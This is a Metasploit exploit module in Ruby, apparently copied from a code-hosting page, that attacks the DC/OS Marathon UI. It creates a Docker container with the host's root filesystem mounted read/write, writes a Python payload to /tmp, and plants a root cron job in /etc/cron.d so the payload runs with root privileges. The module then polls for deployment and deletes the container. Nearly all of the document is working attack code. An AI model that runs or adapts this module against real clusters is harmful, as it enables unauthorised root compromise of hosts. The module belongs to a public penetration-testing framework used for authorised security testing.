196 lines
6.4 KiB
Ruby
196 lines
6.4 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Exploit::FileDropper
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'DC/OS Marathon UI Docker Exploit',
|
|
'Description' => %q{
|
|
Utilizing the DCOS Cluster's Marathon UI, an attacker can create
|
|
a docker container with the '/' path mounted with read/write
|
|
permissions on the host server that is running the docker container.
|
|
As the docker container executes command as uid 0 it is honored
|
|
by the host operating system allowing the attacker to edit/create
|
|
files owed by root. This exploit abuses this to creates a cron job
|
|
in the '/etc/cron.d/' path of the host server.
|
|
|
|
*Notes: The docker image must be a valid docker image from
|
|
hub.docker.com. Furthermore the docker container will only
|
|
deploy if there are resources available in the DC/OS cluster.
|
|
},
|
|
'Author' => 'Erik Daguerre',
|
|
'License' => MSF_LICENSE,
|
|
'References' => [
|
|
[ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
|
|
],
|
|
'Targets' => [
|
|
[ 'Python', {
|
|
'Platform' => 'python',
|
|
'Arch' => ARCH_PYTHON,
|
|
'Payload' => {
|
|
'Compat' => {
|
|
'ConnectionType' => 'reverse noconn none tunnel'
|
|
}
|
|
}
|
|
}
|
|
]
|
|
],
|
|
'DefaultOptions' => { 'WfsDelay' => 75 },
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Mar 03, 2017'))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(8080),
|
|
OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
|
|
OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
|
|
OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
|
|
OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
|
|
])
|
|
end
|
|
|
|
def get_apps
|
|
res = send_request_raw({
|
|
'method' => 'GET',
|
|
'uri' => target_uri.path
|
|
})
|
|
return unless res and res.code == 200
|
|
|
|
# verify it is marathon ui, and is returning content-type json
|
|
return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json'
|
|
apps = JSON.parse(res.body)
|
|
|
|
apps
|
|
end
|
|
|
|
def del_container(container_id)
|
|
res = send_request_raw({
|
|
'method' => 'DELETE',
|
|
'uri' => normalize_uri(target_uri.path, container_id)
|
|
})
|
|
return unless res and res.code == 200
|
|
|
|
res.code
|
|
end
|
|
|
|
def make_container_id
|
|
return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
|
|
|
|
rand_text_alpha_lower(8)
|
|
end
|
|
|
|
def make_cmd(mnt_path, cron_path, payload_path)
|
|
vprint_status('Creating the docker container command')
|
|
payload_data = nil
|
|
echo_cron_path = mnt_path + cron_path
|
|
echo_payload_path = mnt_path + payload_path
|
|
|
|
cron_command = "python #{payload_path}"
|
|
payload_data = payload.raw
|
|
|
|
command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n"
|
|
command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n"
|
|
command << "echo \"\" >> #{echo_cron_path}\n"
|
|
command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n"
|
|
command << "sleep 120"
|
|
|
|
command
|
|
end
|
|
|
|
def make_container(mnt_path, cron_path, payload_path, container_id)
|
|
vprint_status('Setting container json request variables')
|
|
container_data = {
|
|
'cmd' => make_cmd(mnt_path, cron_path, payload_path),
|
|
'cpus' => 1,
|
|
'mem' => 128,
|
|
'disk' => 0,
|
|
'instances' => 1,
|
|
'id' => container_id,
|
|
'container' => {
|
|
'docker' => {
|
|
'image' => datastore['DOCKERIMAGE'],
|
|
'network' => 'HOST',
|
|
},
|
|
'type' => 'DOCKER',
|
|
'volumes' => [
|
|
{
|
|
'hostPath' => '/',
|
|
'containerPath' => mnt_path,
|
|
'mode' => 'RW'
|
|
}
|
|
],
|
|
},
|
|
'env' => {},
|
|
'labels' => {}
|
|
}
|
|
|
|
container_data
|
|
end
|
|
|
|
def check
|
|
return Exploit::CheckCode::Safe if get_apps.nil?
|
|
|
|
Exploit::CheckCode::Appears
|
|
end
|
|
|
|
def exploit
|
|
if get_apps.nil?
|
|
fail_with(Failure::Unknown, 'Failed to connect to the targeturi')
|
|
end
|
|
# create required information to create json container information.
|
|
cron_path = '/etc/cron.d/' + rand_text_alpha(8)
|
|
payload_path = '/tmp/' + rand_text_alpha(8)
|
|
mnt_path = '/mnt/' + rand_text_alpha(8)
|
|
container_id = make_container_id()
|
|
|
|
res = send_request_raw({
|
|
'method' => 'POST',
|
|
'uri' => target_uri.path,
|
|
'data' => make_container(mnt_path, cron_path, payload_path, container_id).to_json
|
|
})
|
|
fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201
|
|
|
|
print_status('The docker container is created, waiting for it to deploy')
|
|
register_files_for_cleanup(cron_path, payload_path)
|
|
sleep_time = 5
|
|
wait_time = datastore['WAIT_TIMEOUT']
|
|
deleted_container = false
|
|
print_status("Waiting up to #{wait_time} seconds for docker container to start")
|
|
|
|
while wait_time > 0
|
|
sleep(sleep_time)
|
|
wait_time -= sleep_time
|
|
apps_status = get_apps
|
|
fail_with(Failure::Unknown, 'No apps returned') unless apps_status
|
|
|
|
apps_status['apps'].each do |app|
|
|
next if app['id'] != "/#{container_id}"
|
|
|
|
if app['tasksRunning'] == 1
|
|
print_status('The docker container is running, removing it')
|
|
del_container(container_id)
|
|
deleted_container = true
|
|
wait_time = 0
|
|
else
|
|
vprint_status('The docker container is not yet running')
|
|
end
|
|
break
|
|
end
|
|
end
|
|
|
|
# If the docker container does not deploy remove it and fail out.
|
|
unless deleted_container
|
|
del_container(container_id)
|
|
fail_with(Failure::Unknown, "The docker container failed to start")
|
|
end
|
|
print_status('Waiting for the cron job to run, can take up to 60 seconds')
|
|
end
|
|
end
|